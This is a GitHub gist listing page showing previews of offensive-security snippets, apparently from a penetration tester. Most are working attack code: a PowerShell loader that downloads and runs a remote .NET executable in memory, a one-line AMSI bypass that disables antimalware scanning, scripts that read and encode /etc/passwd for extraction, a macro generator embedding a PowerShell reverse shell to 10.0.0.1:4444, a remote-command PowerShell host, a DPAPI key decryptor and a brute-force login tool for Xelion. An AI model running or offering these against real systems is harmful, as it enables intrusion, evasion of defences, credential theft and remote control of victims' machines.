Frank Spierings FrankSpierings
FrankSpierings
/ dynamic-main-load-executable-main.ps1
Last active
March 9, 2022 16:42
Load the main of an executable from a remote server, without touching disk.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $url = "http://server/dotnetexecutable" | |
| $data = (New-Object System.Net.WebClient).DownloadData($url); | |
| $assem = [System.Reflection.Assembly]::Load($data); | |
| $main = $assem.EntryPoint | |
| $main.Invoke(0, @(,[string[]]@("args0"))); |
FrankSpierings
/ AMSI-disable.ps1
Created
December 3, 2021 12:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Runtime.InteropServices.Marshal]::Copy([Int32[]]@(0), 0,(([Ref].Assembly.GetTypes()|?{$_.Name -like "*iUtils"}).GetFields('NonPublic,Static')|?{$_.Name -match "Context"}).GetValue($null), 1) |
FrankSpierings
/ shift-refactor-playground.js
Created
September 5, 2021 12:22
Shift-refactor playground
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const { refactor } = require('shift-refactor'); | |
| const { commonMethods } = require('refactor-plugin-common'); | |
| const Shift = require('shift-ast'); | |
| const fs = require('fs'); | |
| const src = ` | |
| var a = "aap"; | |
| function foo() { | |
| function bar() { |
FrankSpierings
/ sql-query-ps-oneliner.ps1
Last active
July 14, 2021 12:42
PowerShell Oneliner to perform database queries.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell "$sql='SELECT @@VERSION';$c=(New-Object -TypeName System.Data.SqlClient.SqlConnection('server=SERVER;Database=DATABASE;Integrated Security=True;'));$c.open();$q=(New-Object System.Data.SqlClient.SqlCommand($sql,$c));$r=$q.ExecuteReader();$oo=@();while ($r.Read()){$o=(New-Object PSObject);for ($i=0;$i -lt $r.FieldCount;$i++){$n=$r.GetName($i);if($n -eq ''){$n='column_'+$i};$o|Add-Member -type NoteProperty -Name $n -Value $r[$i];}$oo+=$o};$oo|FT -Wrap" |
FrankSpierings
/ read-file-aesencrypt-base54.ps1
Created
July 12, 2021 08:20
Read file, encrypt and base64
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $filepath = "/etc/passwd" | |
| $fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open); | |
| $ms = New-Object System.IO.MemoryStream; | |
| $aes = [System.Security.Cryptography.Aes]::Create(); | |
| $aes.keysize = 128; | |
| Write-Host "Key: " (($aes.Key |% ToString X2) -join ''); | |
| Write-Host "IV: " (($aes.IV |% ToString X2) -join ''); | |
| Write-Host "Mode: " $aes.mode | |
| $cs = New-Object System.Security.Cryptography.CryptoStream($ms, $aes.CreateEncryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write); | |
| $fs.CopyTo($cs); |
FrankSpierings
/ read-file-gzip-base64.ps1
Last active
September 6, 2021 14:38
Read file, gzip and convert to base64.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $filepath = "/etc/passwd" | |
| $fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open) | |
| $ms = New-Object System.IO.MemoryStream; | |
| $gzs = New-Object System.IO.Compression.GzipStream($ms, [System.IO.Compression.CompressionMode]::Compress); | |
| $fs.CopyTo($gzs); | |
| $fs.Close(); | |
| $gzs.Close(); | |
| $ms.Close(); | |
| [System.Convert]::ToBase64String($ms.ToArray()); |
FrankSpierings
/ generate-xlsm-macro.py
Created
April 30, 2021 15:30
Generate a XLSM macro from python
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import codecs | |
| import base64 | |
| data = '''$lhost="10.0.0.1"; | |
| $lport=4444; | |
| $MAXCMDLENGTH=65535; | |
| $client = New-Object System.Net.Sockets.TCPClient($lhost, $lport); | |
| $stream = $client.GetStream(); |
FrankSpierings
/ pshost.cs
Created
April 29, 2021 07:20
PowerShell Host example. Obtaining its commands from a remote location.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe pshost.cs /r:c:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | |
| using System; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Runspaces; | |
| using PowerShell = System.Management.Automation.PowerShell; | |
| internal class InfantAnnihilator | |
| { | |
| private static void Main(string[] args) | |
| { |
FrankSpierings
/ ms-rsa-blob-to.py
Last active
April 25, 2021 13:44
Decrypt Protect file using PVK Domain key
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Referenced sources: | |
| # - Mimikatz | |
| # - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/5cf2e6b9-3195-4f85-bc18-05b50e6d4e11 | |
| # - https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/ns-wincrypt-publickeystruc | |
| from io import BytesIO | |
| import struct | |
| import math | |
| import codecs | |
| from Crypto.PublicKey import RSA |
FrankSpierings
/ Brutus.java
Created
March 16, 2021 16:20
Brutus - Brute-force login on a Xelion system using their own classes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| - Get the .jar files from the server (check .jnlp file). | |
| - Extract those .jar files (unzip). | |
| - Place Brutus.java in the same directory. | |
| - Compile using the JDK: "c:\Program Files\Java\jdk-16\bin\javac.exe" -target 1.7 -source 1.7 Brutus.java | |
| - Notice the target & source. Otherwise CORBA can't be found. | |
| - Run: java Brutus <accountname> <ascii password file> <target> | |
| - Example: java Brutus beheerder passwords.txt xelion.local | |
| */ |